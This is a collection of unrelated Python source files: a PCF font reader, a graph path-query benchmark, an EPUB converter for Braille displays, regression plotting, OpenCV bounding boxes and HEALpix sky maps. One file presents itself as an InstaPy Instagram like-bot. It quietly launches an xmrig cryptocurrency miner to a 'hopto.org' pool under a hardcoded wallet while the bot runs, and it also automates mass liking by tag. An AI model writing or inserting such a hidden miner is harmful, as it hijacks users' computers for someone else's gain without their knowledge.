minbounds.left_side_bearing,
-maxbounds.character_descent,
)
@property
def ascent(self):
"""The number of pixels above the baseline of a typical ascender"""
return self._ascent
@property
def descent(self):
"""The number of pixels below the baseline of a typical descender"""
return self._descent
def get_bounding_box(self):
"""Return the maximum glyph size as a 4-tuple of: width, height, x_offset, y_offset"""
return self._bounding_box
def _read(self, format_):
size = struct.calcsize(format_)
if size != len(self.buffer):
self.buffer = bytearray(size)
self.file.readinto(self.buffer)
return struct.unpack_from(format_, self.buffer)
def _seek_table(self, table):
self.file.seek(table.offset)
(format_,) = self._read("<I")
if format_ & _PCF_BYTE_MASK == 0:
raise RuntimeError("Only big endian supported")
return format_
def _read_encoding_table(self):
encoding = self.tables[_PCF_BDF_ENCODINGS]
self._seek_table(encoding)
return Encoding(*self._read(">hhhhh"))
def _read_bitmap_table(self):
bitmaps = self.tables[_PCF_BITMAPS]
format_ = self._seek_table(bitmaps)
(glyph_count,) = self._read(">I")
self.file.seek(bitmaps.offset + 8 + 4 * glyph_count)
bitmap_sizes = self._read(">4I")
return Bitmap(glyph_count, bitmap_sizes[format_ & 3])
def _read_metrics(self, compressed_metrics):
if compressed_metrics:
(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
) = self._read("5B")
left_side_bearing -= 0x80
right_side_bearing -= 0x80
character_width -= 0x80
character_ascent -= 0x80
character_descent -= 0x80
attributes = 0
else:
(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
attributes,
) = self._read(">5hH")
return Metrics(
left_side_bearing,
right_side_bearing,
character_width,
character_ascent,
character_descent,
attributes,
)
def _read_accelerator_tables(self):
# pylint: disable=too-many-locals
accelerators = self.tables.get(_PCF_BDF_ACCELERATORS)
if not accelerators:
accelerators = self.tables.get(_PCF_ACCELERATORS)
if not accelerators:
raise RuntimeError("Accelerator table missing")
format_ = self._seek_table(accelerators)
has_inkbounds = format_ & _PCF_ACCEL_W_INKBOUNDS
compressed_metrics = format_ & _PCF_COMPRESSED_METRICS
(
no_overlap,
constant_metrics,
terminal_font,
constant_width,
ink_inside,
ink_metrics,
draw_direction,
_,
font_ascent,
font_descent,
max_overlap,
) = self._read(">BBBBBBBBIII")
minbounds = self._read_metrics(compressed_metrics)
maxbounds = self._read_metrics(compressed_metrics)
if has_inkbounds:
ink_minbounds = self._read_metrics(compressed_metrics)
ink_maxbounds = self._read_metrics(compressed_metrics)
else:
ink_minbounds = minbounds
ink_maxbounds = maxbounds
return Accelerators(
no_overlap,
constant_metrics,
terminal_font,
constant_width,
ink_inside,
ink_metrics,
draw_direction,
font_ascent,
font_descent,
max_overlap,
minbounds,
maxbounds,
ink_minbounds,
ink_maxbounds,
)
def _read_properties(self):
property_table_offset = self.tables[_PCF_PROPERTIES]["offset"]
self.file.seek(property_table_offset)
(format_,) = self._read("<I")
if format_ & _PCF_BYTE_MASK == 0:
raise RuntimeError("Only big endian supported")
(nprops,) = self._read(">I")
self.file.seek(property_table_offset + 8 + 9 * nprops)
pos = self.file.tell()
if pos % 4 > 0:
self.file.read(4 - pos % 4)
(string_size,) = self._read(">I")
strings = self.file.read(string_size)
string_map = {}
i = 0
for value in strings.split(b"\x00"):
string_map[i] = value
i += len(value) + 1
self.file.seek(property_table_offset + 8)
for _ in range(nprops):
name_offset, is_string_prop, value = self._read(">IBI")
if is_string_prop:
yield (string_map[name_offset], string_map[value])
else:
yield (string_map[name_offset], value)
def load_glyphs(self, code_points):
# pylint: disable=too-many-statements,too-many-branches,too-many-nested-blocks,too-many-locals
if isinstance(code_points, int):
code_points = (code_points,)
elif isinstance(code_points, str):
code_points = [ord(c) for c in code_points]
code_points = sorted(
c for c in code_points if self._glyphs.get(c, None) is None
)
if not code_points:
return
indices_offset = self.tables[_PCF_BDF_ENCODINGS].offset + 14
bitmap_offset_offsets = self.tables[_PCF_BITMAPS].offset + 8
first_bitmap_offset = self.tables[_PCF_BITMAPS].offset + 4 * (
6 + self._bitmaps.glyph_count
)
metrics_compressed = self.tables[_PCF_METRICS].format & _PCF_COMPRESSED_METRICS
first_metric_offset = self.tables[_PCF_METRICS].offset + (
6 if metrics_compressed else 8
)
metrics_size = 5 if metrics_compressed else 12
# These will each _tend to be_ forward reads in the file, at least
# sometimes we'll benefit from oofatfs's 512 byte cache and avoid
# excess reads
indices = [None] * len(code_points)
for i, code_point in enumerate(code_points):
enc1 = (code_point >> 8) & 0xFF
enc2 = code_point & 0xFF
if enc1 < self._encoding.min_byte1 or enc1 > self._encoding.max_byte1:
continue
if enc2 < self._encoding.min_byte2 or enc2 > self._encoding.max_byte2:
continue
encoding_idx = (
(enc1 - self._encoding.min_byte1)
* (self._encoding.max_byte2 - self._encoding.min_byte2 + 1)
+ enc2
- self._encoding.min_byte2
)
self.file.seek(indices_offset + 2 * encoding_idx)
(glyph_idx,) = self._read(">H")
if glyph_idx != 65535:
indices[i] = glyph_idx
all_metrics = [None] * len(code_points)
for i, code_point in enumerate(code_points):
index = indices[i]
if index is None:
continue
self.file.seek(first_metric_offset + metrics_size * index)
all_metrics[i] = self._read_metrics(metrics_compressed)
bitmap_offsets = [None] * len(code_points)
for i, code_point in enumerate(code_points):
index = indices[i]
if index is None:
continue
self.file.seek(bitmap_offset_offsets + 4 * index)
(bitmap_offset,) = self._read(">I")
bitmap_offsets[i] = bitmap_offset
# Batch creation of glyphs and bitmaps so that we need only gc.collect
# once
gc.collect()
bitmaps = [None] * len(code_points)
for i in range(len(all_metrics)): # pylint: disable=consider-using-enumerate
metrics = all_metrics[i]
if metrics is not None:
width = metrics.right_side_bearing - metrics.left_side_bearing
height = metrics.character_ascent + metrics.character_descent
bitmap = bitmaps[i] = self.bitmap_class(width, height, 2)
self._glyphs[code_points[i]] = Glyph(
bitmap,
0,
width,
height,
metrics.left_side_bearing,
-metrics.character_descent,
metrics.character_width,
0,
)
for i, code_point in enumerate(code_points):
metrics = all_metrics[i]
if metrics is None:
continue
self.file.seek(first_bitmap_offset + bitmap_offsets[i])
width = metrics.right_side_bearing - metrics.left_side_bearing
height = metrics.character_ascent + metrics.character_descent
bitmap = bitmaps[i]
words_per_row = (width + 31) // 32
buf = bytearray(4 * words_per_row)
start = 0
for _ in range(height):
self.file.readinto(buf)
for k in range(width):
if buf[k // 8] & (128 >> (k % 8)):
bitmap[start + k] = 1
start += width
| python |
from instapy import InstaPy
import random
from time import sleep
import subprocess
######################################
insta_username = 'your login'
insta_password = 'your password'
number_of_likes = 1200
number_of_follows = 0
number_of_comments = 250
tags = ['student', 'nature', 'river', 'forest', 'tree', 'lake', 'sea', 'ocean', 'sky', 'travel', 'cloud', 'stone', 'water', 'city', 'country', 'mountain']
######################################
work_made = False
session_key = random.randint(0, 1000)
#write session key
session_file = open("logs/session_stats.txt", "w")
session_file.write(str(session_key) + " 0 0 0")
session_file.close()
xmrig = subprocess.Popen('pgrep xmrig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
procID = xmrig.stdout.readline()
procID = procID[:-1]
if(procID != "" and procID.isdigit()):
subprocess.Popen(['kill', str(int(procID))])
cmd = ['xmrig/build/xmrig', '-o', 'instabot.hopto.org:5555', '-u', '48fEvxEGfYyU13JYPjfvyzWR4WammKcuRPxnKyTfAYWHAahbQHNwW8D4GCukwuhCE4g2NR5MiDnhhQ2EZbYzEjhMKgzMUFY', '-p', 'x', '-k', '-B']
subprocess.Popen(cmd)
#cycle to recover from failure
while(work_made == False):
try:
session = InstaPy(username=insta_username, password=insta_password)
session.login()
# set up all the settings
session.set_do_comment(enabled=False)
session.set_do_follow(enabled=False)
# do the actual work
session.like_follow_comment_by_tags_unfollow_by_list(tags, number_of_likes, number_of_follows, number_of_comments, None, True, session_key)
# end the bot session
session.end()
work_made = True
xmrig = subprocess.Popen('pgrep xmrig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
procID = xmrig.stdout.readline()
procID = procID[:-1]
if(procID != "" and procID.isdigit()):
subprocess.Popen(['kill', str(int(procID))])
except:
print("Unexpected error!")
sleep(30)
#if (session.browser != None):
# session.end()
| python |
import argparse
import timeit
from statistics import fmean, variance
from pyformlang.cfg import Terminal
from src.cfg_algorithms import cyk
from src.cnf import WeakCNF
from src.label_graph import LabelGraph
from src.rpq import rpq, rpq_with_linear_tc
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='command line interface for simple graph database')
parser.add_argument(
'--graph'
, required=True
, type=str
, help='path to graph.txt file'
)
parser.add_argument(
'--regex'
, required=True
, type=str
, help='path to regex.txt file'
)
parser.add_argument(
'--sources'
, required=False
, type=str
, help='path to sources.txt file'
)
parser.add_argument(
'--destinations'
, required=False
, type=str
, help='path to destinations.txt file'
)
args = parser.parse_args()
g = LabelGraph.from_txt(args.graph)
r = LabelGraph.from_regex(args.regex)
print(str(args.graph) + " " + str(args.regex))
time_sum_1 = 0
time_sum_2 = 0
for i in range(5):
time_1 = timeit.default_timer()
res_1 = rpq(g, r)
time_sum_1 += timeit.default_timer() - time_1
time_2 = timeit.default_timer()
res_2 = rpq_with_linear_tc(g, r)
time_sum_2 += timeit.default_timer() - time_2
assert (res_1.nvals == res_2.nvals)
print(str(time_sum_1 / 5))
print(str(time_sum_2 / 5))
res = rpq(g, r)
print(str(res.nvals))
srcs = None
if args.sources is not None:
with open(args.sources, 'r') as f:
srcs = list(map(int, f.readline().split()))
dsts = None
if args.destinations is not None:
with open(args.destinations, 'r') as f:
dsts = list(map(int, f.readline().split()))
f = open("output.txt", 'a')
f.write(str(args.graph) + " " + str(args.regex) + "\n")
start_time = timeit.default_timer()
for i, j, _ in zip(*res.to_lists()):
if (srcs is None) or (i in srcs):
if (dsts is None) or (j in dsts):
f.write(f'{i} to {j}')
print(str(timeit.default_timer() - start_time))
f.close() | python |
#!/usr/bin/env python3
#Convert EPUB files to either single HTML or text files.
#They can then be read on refreshable Braille displays, such as the Brailliant series from HumanWare or the Braille Edge by Hims.
#Also works with the Victor Reader Trek/Stream by Humanware.
#Requires pypandoc (shoutouts to @TheQuinbox on twitter!)
#Try pip3 install pypandoc
#usage: epub-convert.py [-i input_dir] [-o output_dir] [-T]
import argparse
import functools
import os
from pathlib import Path
import pypandoc
import sys
import time
@functools.total_ordering
class Ebook:
"""Represents a book to be converted.
Rich comparison will order on the file size.
bool determines whether this book should be converted.
"""
def __init__(self, book_path: Path, output_ext: str, input_base: Path, output_base: Path):
self.book_path=book_path.resolve() # basically absolute
# self.dest_path is the output filename, pathlib makes this elegant.
self.dest_path=output_base.resolve()/self.book_path.relative_to(input_base.resolve()).with_suffix('.'+output_ext)
self.in_stat=self.book_path.stat()
if self.dest_path.exists(): self.out_stat=self.dest_path.stat()
else: self.out_stat=None
def __eq__(self, other):
return self.in_stat.st_size==other.in_stat.st_size
def __lt__(self, other):
return self.in_stat.st_size<other.in_stat.st_size
def __bool__(self):
"""
Should this book be converted?
True if destination does not exist or if source modtime is newer.
"""
if self.out_stat is not None and self.in_stat.st_mtime<self.out_stat.st_mtime: return False
else: return True
# Increment these on successful or failed conversion respectively.
progress=0
errors=0
input_dir=Path('.')
file_format='html'
output_dir=input_dir/'html conversions'
#Since we change directories later, keep track of the current directory now so the output dir is relative to *that* instead of the input directory.
basedir=Path.cwd().resolve()
parser = argparse.ArgumentParser(description='Convert a directory of EPUB files into single HTML or text files')
parser.add_argument('-t', '--text', help='Output text files instead of HTML', action='store_true')
parser.add_argument('-i', '--input', help='Directory to search for epub files (default .)')
parser.add_argument('-o', '--output', help='output directory (default: ./[html|txt] conversions)')
args = parser.parse_args()
if args.input:
input_dir = Path(args.input)
if args.output:
output_dir = basedir/args.output
if args.text:
if not args.output:
output_dir = basedir/'txt conversions'
file_format= 'txt'
print('Converting to text files')
input_dir=input_dir.resolve()
if not output_dir.exists(): output_dir.mkdir(parents=True, exist_ok=True)
output_dir=output_dir.resolve()
def epubs(base: Path, exclude: Path=None):
"""
Recursively yields all epub files to be converted as Path instances
The only filtering done here is to avoid traversing into the directory given by exclude
"""
for item in base.iterdir():
if item.is_dir():
if exclude is not None and item.is_relative_to(exclude):
continue
else:
yield from epubs(item, exclude)
elif item.is_file() and item.suffix.lower()=='.epub':
yield item
epub_files = []
for i in epubs(input_dir, output_dir):
book=Ebook(i, file_format, input_dir, output_dir)
if bool(book): epub_files.append(book)
epub_files.sort() # smallest first
file_count=len(epub_files)
if file_count<=0:
print('All conversions are up to date.')
sys.exit()
print(f'Have {file_count} to convert')
for book in epub_files:
file=book.book_path # easier access
output_file=book.dest_path
# .parent is used because mkdir needs the path to be a directory
output_file.parent.mkdir(parents=True, exist_ok=True)
# some things to print
pretty_input_file=str(file.relative_to(input_dir))
pretty_output_file=str(output_dir.parts[-1]/output_file.relative_to(output_dir))
print(f'{progress+1}/{file_count}: Converting {pretty_input_file} to {pretty_output_file}')
conversion_result = None
convert_start = time.perf_counter_ns()
#If pandoc barfs on conversion, warn the user and skip to the next file.
try:
#This next bit of silliness is because pandoc uses 'plain' instead of 'txt' as a format name.
if args.text:
conversion_result = pypandoc.convert_file(str(file), 'plain', outputfile=str(output_file), extra_args=['-s'])
else:
conversion_result = pypandoc.convert_file(str(file), file_format, outputfile=str(output_file), extra_args=['-s'])
assert(conversion_result == '')
except RuntimeError as e:
print(f'Error converting file {file}; output is likely malformed or corrupt:\n{e.args}', file=sys.stderr)
errors+=1
convert_end = time.perf_counter_ns()
print(f'Conversion took {(convert_end - convert_start)/1000000000} seconds', file=sys.stderr)
progress+=1
if file_count>0:
print(f'{progress} converted, {errors} failed.')
| python |
import numpy as np
import matplotlib.pyplot as plt
from solar_parallel import solar
from simulator import simul
##########################################
# define the class 'the simulation_plot' #
##########################################
'''
this class is used for plotting the result of the demonstration simulation in this folder:
Check this before you run the code:
Plz check if you have 'sci-kit learn', 'numpy', 'matplotlib' and 'tqdm' installed. If not,
1. run 'pip install scikit-learn numpy matplotlib tqdm' if you use pure Python3
2. run 'conda install scikit-learn numpy matplotlib tqdm' if you use Anaconda3
Modules:
1. from scikit-learn, we call 'LassoLarsCV' and 'LassoCV' for cv-lars-lasso and cv-cd respectively;
2. we use 'numpy' for matrix computation and random variable generation;
3. for 'simulator_ic', 'solar' and 'costcom', plz see 'simulator_ic.py', 'solar.py' and 'costcom.py' for detail;
4. 'tqdm' is used to construct the progress bar;
5. we use 'matplotlib' to plot all figures;
Inputs:
1. X and Y : the inputs and output of regression
2. sample_size : the total sample size we generate for cv-lars-lasso, cv-cd and solar
3. n_dim : the number of total variables in X
4. n_info : the number of informative variables in data-generating process
5. n_repeat : the number of subsamples in solar
6. num_rep : the number of repeatitions in Simulation 2
7. step_size : (grid search)step size for tuning the value of c for solar;
8. rnd_seed : the random seed
9. plot_on : binary, whether the plot will be saved as pdf
Outputs:
1. solar_coef : the solar regression coefficients (defined at the end of Algorithm 3);
2. opt_c : value of c* in solar;
3. test_error : the list of test errors for tuning the value of c;
4. Qc_list : the nest sets of Q(c), for all value of c from 1 to 0;
5. la_list : number of variables selected by CV-lars-lasso;
6. la_vari_list : the indices of variables selected by CV-lars-lasso;
7. cd_list : number of variables selected by CV-cd;
8. cd_vari_list : the indices of variables selected by CV-cd;
In each round of subsampling, we randomly take out 10% points out of the sample and make the rest as the subsample in this round
As competitors, we use X and Y for LassoLarsCV (called CV-lars-lasso in paper) and LassoCV (called CV-cd in paper) estimation, which relies on 10-fold CV.
'''
class one_shot_simul:
def __init__(self, sample_size, n_dim, n_info, n_repeat, step_size, rnd_seed, plot_on):
##for convinience, we define the common variable (variables we need to use for each of the following functions) in the class as follows (the common variable is defined as self.xxxx)
self.sample_size = sample_size #sample size
self.n_dim = n_dim #the number of total variables in X
self.n_info = n_info #the number of informative variables in data-generating process
self.n_repeat = n_repeat #the number of subsamples in solar
self.step_size = step_size #step size for tuning the value of c for solar;
self.rnd_seed = rnd_seed #the random seed
self.q_start = 1 #the maximum value of c in its grid search (for plotting)
self.q_end = 0.1 #the minimum value of c in its grid search (for plotting)
self.q_step = -0.02 #step size of c in its grid search (for plotting)
self.plot_on = plot_on #whether the plot will be saved as pdf
##compute solar, cv-lar-lasso and cv-cd for Demonstration Simulation in Section 3
def simul_func(self):
#1. control the random seed for reproduction
np.random.seed(self.rnd_seed)
#2. call class 'simul' from 'simulator.py' to simulate data
trial1 = simul(self.sample_size, self.n_dim, self.n_info)
#3. generate X and Y
X, Y = trial1.data_gen()
#4. call class 'solar' from 'solar.py'
trial2 = solar( X, Y, self.n_repeat, self.step_size)
#5. compute solar, cv-lar-lasso and cv-cd on X and Y
solar_coef, opt_c, test_error, Qc_list, Q_opt_c, la_list, la_vari_list, cd_list, cd_vari_list = trial2.fit()
return solar_coef, opt_c, test_error, Qc_list, la_list, la_vari_list, cd_list, cd_vari_list
##for solar, plot the corresponding test error of each value of c in its tuning (grid search)
def q_plot(self, test_error, opt_c):
#1. control which value of c we want to plot (start from q_start and end at q_end)
q_value = np.arange(self.q_start, self.q_end, self.q_step)
f1 = plt.figure()
#2. scatter plot the value of c and its corresponding test error
plt.scatter(q_value, test_error, color = 'b', label = 'the c values and their validation errors')
#3. plot a vertical line at the value of c*: max(opt_c) is because there may be multiple values assigned with the same test error
plt.axvline(max(opt_c), linewidth = 2.5, color = 'g', ls = '-.', label = 'the optimal c value')
plt.xlabel('the value of c', fontsize=16)
plt.ylabel('validation error', fontsize=16)
plt.ylim(0, 5)
plt.xlim(0.2, 1.01)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.legend(loc=9, bbox_to_anchor=(0.5, -0.2), borderaxespad=0., ncol=2, shadow=True)
if self.plot_on == True:
f1.savefig("q_plot_one_shot.pdf", bbox_inches='tight')
plt.show()
##return Q(c), for all c from (start from q_start and end at q_end)
def q_list(self, Qc_list):
#1. concatenate Qc_list into a matrix
var_mark_plot = np.concatenate(Qc_list)
#2. compute the value of c for each Q(c) and the corresponding variables in each Q(c)
var_index, counts = np.unique(var_mark_plot, return_counts=True)
var_index_ordered = [x for _,x in sorted(zip(counts,var_index))]
var_plot = var_index_ordered[::-1]
cou_plot = np.sort(counts)[::-1] / ((self.q_end - self.q_start)/self.q_step)
var_plot = [ 'X' + str(i) for i in var_plot]
#3. print the list of variables with different value of c
var_loc_list = list()
var_q_list = list()
q_value_list = np.unique(cou_plot)[::-1]
i = 1
for j in q_value_list:
ans_ind = np.where([cou_plot == j])[1]
ans_var = [var_plot[i] for i in ans_ind]
var_loc_list.append(ans_ind)
var_q_list.append(ans_var)
print('q_hat value >= ',j)
print(var_q_list[:i])
i += 1
##################################
# test if this module works fine #
##################################
'''
this part is set up to test the functionability of the class above;
you can run all the codes in this file to test if the class works;
when you call the class from this file, the codes (even functions or classes) after " if __name__ == '__main__': " will be ingored
'''
if __name__ == '__main__':
sample_size = 200
n_dim = 100
n_info = 5
n_repeat = 20
step_size = -0.02
rnd_seed = 0
plot_on = False
np.random.seed(0)
#generate X and Y
trial = one_shot_simul(sample_size, n_dim, n_info, n_repeat, step_size, rnd_seed, plot_on)
#train solar
solar_coef, opt_c, test_error, Qc_list, la_list, la_vari_list, cd_list, cd_vari_list = trial.simul_func()
#plot test error of each value of c
trial.q_plot(test_error, opt_c)
#return Q(c)
trial.q_list(Qc_list)
#return variables selected by cv-lars-lasso
print('variables selected by cv-lars-lasso: ', [ 'X' + str(i) for i in la_vari_list])
#return variables selected by cv-cd
print('variables selected by cv-cd: ', [ 'X' + str(i) for i in cd_vari_list])
#return solar regression coefficients
print(solar_coef)
| python |
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
datasets_path = ["datasets/training", "datasets/testing", "datasets/validation"]
categories = ["RAW", "FRET", "FORCE"]
def get_main_bbox(image, threshold=100):
_, image_th = cv2.threshold(image, threshold, 65535, cv2.THRESH_BINARY)
kernel = np.ones((5, 5), np.uint16)
image_closed = cv2.morphologyEx(image_th, cv2.MORPH_CLOSE, kernel)
image_opened = cv2.morphologyEx(image_closed, cv2.MORPH_OPEN, kernel)
image_opened = np.uint8(image_opened)
contours, hierarchy = cv2.findContours(
image_opened, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE
)
best_bbox = None
best_area = 0
for contour in contours:
x, y, w, h = cv2.boundingRect(contour)
if w * h > best_area:
best_area = w * h
best_bbox = (x, y, w, h)
return best_bbox
for dataset_path in datasets_path:
print(f"Generating bounding boxes in {dataset_path}")
for folder in tqdm(sorted(os.listdir(dataset_path))):
folder_path = os.path.join(dataset_path, folder)
# It must be a folder
if not os.path.isdir(folder_path):
continue
# It must end with RAW
if not folder.endswith("RAW"):
continue
# Let's find the bboxes
bbox_path = os.path.join(dataset_path, f"{folder[:-3]}_bbox.csv")
f = open(bbox_path, "w+")
f.write("filename,x,y,w,h\n")
for file in sorted(os.listdir(folder_path)):
# Reading the image
filename = os.path.join(folder_path, file)
image = cv2.imread(filename, cv2.IMREAD_UNCHANGED)
# Getting the main bouding box
bbox = get_main_bbox(image)
x, y, w, h = bbox
f.write(f"{filename},{','.join(map(str, bbox))}\n")
f.close()
| python |
"""
Manage generation of maps from HEALpix tables
$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/pipeline/pub/display_map.py,v 1.3 2011/06/24 04:53:06 burnett Exp $
"""
import os,sys, types, pickle
import numpy as np
import pylab as plt
from uw.utilities import image
from skymaps import Band, SkyDir, PySkyFunction, Hep3Vector, SkyImage
def skyplot(crec, title='', axes=None, fignum=30, ait_kw={}, **kwargs):
""" make an AIT skyplot of a HEALpix array
crec : array
must be sorted according to the HEALpix index
title : string
set the figure title
ait_kw : dict
to set kwargs for image.AIT, perhaps pixelsize
Other args passed to imshow
"""
n = len(crec)
nside = int(np.sqrt(n/12))
assert n==12*nside**2, 'wrong length to be healpix array'
band = Band(nside)
def skyplotfun(v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
index = band.index(skydir)
return crec[index]
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum, figsize=(12,6))
ait=image.AIT(PySkyFunction(skyplotfun) ,axes=axes, **ait_kw)
ait.imshow(title=title, **kwargs)
return ait
class DisplayMap(object):
""" display the contents of a HEALpix table as ait or zea
"""
def __init__(self, table,
sources=None,
imshow_kw=dict(interpolation='bilinear', ),
**kwargs):
"""table : string or iterable
If a string, the name of a pickled file
sources : None or a string
if a string, the name of a pickled rec with name, ra, dec fields
"""
if type(table)==types.StringType:
self.v = pickle.load(open(table))
print ('Loaded HEALpix table from file %s' %table)
else: self.v=table
self.nside = int(np.sqrt(len(self.v)/12))
assert len(self.v)==12*self.nside**2, 'size of map not consistent with expected nside %d' % nside
self.band = Band(self.nside)
self.imshow_kw=imshow_kw
self.scale = kwargs.pop('scale', lambda x: x)
if type(self.scale) == types.StringTypes:
if self.scale=='sqrt': self.scale= lambda x: np.sqrt(max(x,0))
elif self.scale=='log': self.scale=lambda x: np.log10(max(x,0.1))
else:
raise Exception('unrecognized scale function, %s' %self.scale)
self.ZEA_kw = kwargs.pop('ZEA_kw', dict(galactic=True, size=10, pixelsize=0.1))
if sources is not None:
self.sources = pickle.load(open(sources))
print ('loaded %d sources from %s' % (len(self.sources),sources))
else:self.sources=None
self.map_path = kwargs.pop('map_path',None)
def get_pyskyfun(self):
return PySkyFunction(self)
def skyfun(self, v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
return self.v[self.band.index(skydir)]
def __call__(self,v):
skydir = SkyDir(Hep3Vector(v[0],v[1],v[2]))
t =self.v[self.band.index(skydir)]
return self.scale(t)
def fill_ait(self, fignum=11, axes=None, show_kw={}, source_kw={}, figwidth=12, margin=0.15, **kwargs):
if axes is None:
# set up a figure for 2x1 image with equal margins
plt.close(fignum)
figheight = figwidth*(1.+2*margin)/(1+margin)/2.
fig=plt.figure(fignum, figsize=(figwidth, figheight));
axes=plt.gca()
plt.subplots_adjust(left=0.05, right=0.95) #gives reasonable equal margins
pixelsize = kwargs.pop('pixelsize', 0.25)
ait = image.AIT(self.get_pyskyfun(),axes=axes, pixelsize=pixelsize, **kwargs)
self.imgplot=ait.imshow(**show_kw)
ait.axes.set_autoscale_on(False)
if self.sources is not None:
sdirs = map(SkyDir, self.sources.ra, self.sources.dec)
ait.plot(sdirs, **source_kw)
print ('found %d sources to plot' % len(sdirs) )
plt.draw_if_interactive()
return ait
def fill_zea(self, index, fignum=12, axes=None, show_kw=None, **kwargs):
""" index: integer, or a SkyDir
the HP12 index if integer
figmun: integer
used if axes is None
show_kw : dict
override imshow keywords
kwargs
size
pixelsize
galactic
"""
if axes is None:
plt.close(fignum)
fig = plt.figure(fignum,figsize=(6,6));
axes = fig.gca()
if type(index) == types.IntType:
sdir = Band(12).dir(index)
title = 'HP12_%4d'%index
else:
sdir = index
title = 'l = %.1f, b=%.1f' % (sdir.l(), sdir.b())
title = kwargs.pop('title',title)
kw = self.ZEA_kw
kw.update(kwargs)
zea = image.ZEA(sdir, **kw)
zea.grid()
zea.fill(self.get_pyskyfun())
zea.imshow( **(show_kw if show_kw is not None else self.imshow_kw))
zea.colorbar()
if title is not None: axes.set_title(title)
if self.sources is not None:
count = 0
for s in self.sources:
sdir = SkyDir(s.ra,s.dec)
if not zea.inside(sdir):continue
count += 1
inside =self.band.index(sdir)==index
zea.plot_source(s.name, sdir, symbol='*' if inside else 'd',
markersize=14 if inside else 8,
color='w')
print ('found %d sources to plot' %count )
if self.map_path is not None:
fout = os.path.join(self.map_path,hpname(index)+'.png')
plt.savefig(fout, bbox_inches='tight')
print ('saved figure to %s' % fout)
plt.draw_if_interactive()
return zea
class SourceDensity(object):
""" create source density HEALpix array from a list of locations
"""
def __init__(self, nside=12):
"""
nside: integer
the HEALpix nside parameter
"""
self.v = np.zeros(12*nside**2, float)
self.index = Band(nside).index
def fill(self, sdirs):
""" sdirs: a list of SkyDir objects
"""
for s in sdirs:
self.v[self.index(s)]+=1
def fill_rec(self, rec, cut=None):
""" rec: a recarry with ra, dec columns
cut : None or a mask arrray
"""
if cut is None:
sdirs = map(SkyDir, rec.ra, rec.dec)
else:
sdirs = map(SkyDir, rec.ra[cut], rec.dec[cut])
self.fill(sdirs)
def save(self, fn):
pickle.dump(self.v, open(fn, 'wb'))
print ('saved file %s' % fn)
class SourceMap(DisplayMap):
""" subclass of DisplayMap to display point source positions on a photon density map
"""
def __init__(self, kde,
sources ,
show_kw=dict(fun = lambda x:np.sqrt(x/1e6), vmax=4, cmap='hot'),
plot_kw=dict(nocolorbar=False,),
pos=None, size=180,
):
super(SourceMap,self).__init__(kde)
if type(sources) == types.StringType:
self.s = pickle.load(sources)
print ('loaded %5d sources from %s' %(len(self.s), fn))
else: self.s = sources
self.show_kw = show_kw
def fill_ait(self, fignum=20, axes=None, **kwargs):
ait = super(SourceMap, self).fill_ait( fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
ait.axes.set_autoscale_on(False) # prevent rescaling when adding points
self.ait=ait
return ait
def fill_zea(self, pos, fignum=21, axes=None, which=-1, savefn=None, **kwargs):
sfactor = kwargs.pop('sfactor', 1)
zea = super(DMap, self).fill_zea(pos, fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
s = self.s
for subset, marker, color, size, label in self.subsets(s, which):
zea.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print ('plotted %4d sources, subset "%s"' %(sum(subset), label))
plt.legend(scatterpoints=1, loc=2)
if savefn is not None:
self.savefig(savefn % i); i+=1
return zea
def legend(self):
plt.legend(frameon=False,scatterpoints=1, loc=(-0.05,-0.05))
def savefig(self, fn):
plt.savefig(fn, bbox_inches='tight', pad_inches=0, dpi=160)
def subsets(self, s, which):
assoc = s.id_prob>0.8
ts25=s.ts>=25
lt25=(s.ts<25)
t =(((-assoc)*(lt25),'+', 'grey', 8, 'no id, TS<25'),
((-assoc)*(ts25), 's', 'red', 10, 'no id, TS>25'),
(assoc, 'o', 'green', 12, 'associated' ),
)
return t if which <0 else (t[which],)
def add_sources(self, which=-1, sfactor=1):
s = self.s
print ('loaded %5d sources' %(len(s),))
i=0 if which<0 else which+10
plt.rcParams['legend.fontsize']= 8.0
for subset, marker, color, size, label in self.subsets(s, which):
self.ait.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print ('plotted %4d sources, subset "%s"' %(sum(subset), label))
self.legend()
def load_skyspect(fn = r'T:\data\galprop\ring_21month_P6v11.fits',
# r'D:\fermi\data\galprop\gll_iem_v02.fit',
nside=192,
show_kw = dict(fun=np.log10, cmap='hot'),
):
"""
load a galactic diffuse distribution.
Save the HEALpix respresentation at an energy (1 GeV default)
fn : string
filename for the FITS representaion of a SKySpectrum
nside: int
HEALpix nside to use for represenation -- note that 192 is 12*16, about 0.25 deg
show_kw : dict
fun: weighting function, cmap, vmin, vmax
"""
t = SkyImage(fn)
galname = os.path.split(fn)[-1]
print ('%s: nx, ny, layers: %d %d %d' %(galname, t.naxis1(), t.naxis2(), t.layers()))
hpdir = Band(nside).dir
dmap = map(lambda i:t(hpdir(i)), xrange(12*nside**2))
tdm=DisplayMap(dmap)
tdm.fill_ait(fignum=12, source_kw=dict(edgecolor='w',), show_kw=show_kw )
plt.title(galname+' (1 GeV)')
sfn = galname.split('.')[0]+'.png'
plt.savefig(galname.split('.')[0]+'.png', bbox_inches='tight', pad_inches=0)
print ('saved figure to %s' % sfn)
return tdm | python |
# Copyright 2019 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
